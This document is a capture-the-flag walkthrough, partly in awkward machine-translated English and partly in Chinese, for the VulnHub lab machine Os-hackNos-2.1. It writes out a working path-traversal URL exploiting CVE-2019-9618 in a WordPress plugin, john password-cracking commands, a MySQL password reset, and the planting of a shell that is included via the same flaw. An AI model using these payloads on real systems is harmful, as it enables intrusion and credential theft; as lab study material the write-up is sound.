**
VulnHub-hackNos: Os-hackNos-2.1-Walkthrough
**
Drone address: https: //www.vulnhub.com/entry/hacknos-os-hacknos,401/
drone Difficulty: Easy + Intermediate (CTF)
drone Release Date: November 29, 2019
drone Description:
Difficulty : the Easy to Intermediate
Flag: Flag 2 First the User And SECOND, root
Learning: the Application Web | Enumeration | Password Cracking
Changelog - 2019-12-13 ~ V1.1 - 2019-11-29 ~ v1.0
author: Dayu
time: 2020 -02-09
Note: for all these computers, I've downloaded using a computer running VMware. I will use Kali Linux as a solution to the attacker's machine the CTF. Here the use of technology for learning for educational purposes only, if the technology is listed for any other goal, I will not be responsible.
First, information collection
We need to determine the target's IP address in the VM, you need to use nmap to obtain the destination IP address:
We've found the CTF target computer IP address: 192.168.56.144
nmap find open ports 22, 80 and 1 ... here the same ...
after the front did a 1 ... a direct blast to ...
find tsweb directory ... look down may find that this is wordpress CMS architecture, you can use wpscan ...
directly on wpscan first ...
familiar gracemedia-media-player plug-in ... Google to find the next ...
can using the CVE-2019-9618 vulnerability penetration ... link
command: http://192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
find flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/
this is a hash value ... blasting at john ...
command: john --wordlist=/usr/share/wordlists/rockyou.txt dayu
command: john --show dayu
get an account and password: flag, topsecret
Second, the right to mention
method 1
Successful login ...
Note that this is restricted, TTY referred to ...
did not have permission to use this command ... it can only look at the root, skip ...
here looking for a long time, only to find there is a pass under backups ... should be password ... MD5 value is found ...
$1$rohit$01Dl0NQKtgfeL08fGrggi0
john blasting password:!% hack41
get the first flag ...
ALL mentioning ... is ... right
in front of id can view the executable sudo ... directly mention the right sudo su to the root user, and view the second flag ...
Method 2
前面通过查看pass文件直接获得密码…然后sudo提权…
这边我利用数据看看…GO
前面获得flag方法一样…继续提root权限…
一路跟着我学习过来的都知道,查看数据库需要找到wp-config.php文件…里面包含了数据库账号密码…找它!!
一般都在html目录下面查找…找到了…
发现用户名密码:wpuser、hackNos-2.com
命令:mysql -h localhost -uwpuser -phackNos-2.com
发现:$P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2/
解密不出,跳过跳过…等了半天半天,最后也没解密出来…
命令:update wp_users set user_pass=md5("dayu") where user_login='user';
这里我直接使用命令,虽然破解不了,我将user用户密码修改为dayu
成功通过用户密码:user/dayu,登陆进入…
进来后,很熟悉的界面了,这里直接利用即可…
将dayushell复制进来…利用readme.txt即可…
然后利用之前的LFI漏洞包含该txt文件即可…记得本地开启nc…
命令:192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../var/www/html/tsweb/wp-content/themes/twentytwenty/readme.txt
看来只能获得www-data权限…这边继续往下走就能获得root…不过这是一个思路,可能还有别的方法…如果有请告诉我,谢啦!!
凌晨文章…
由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。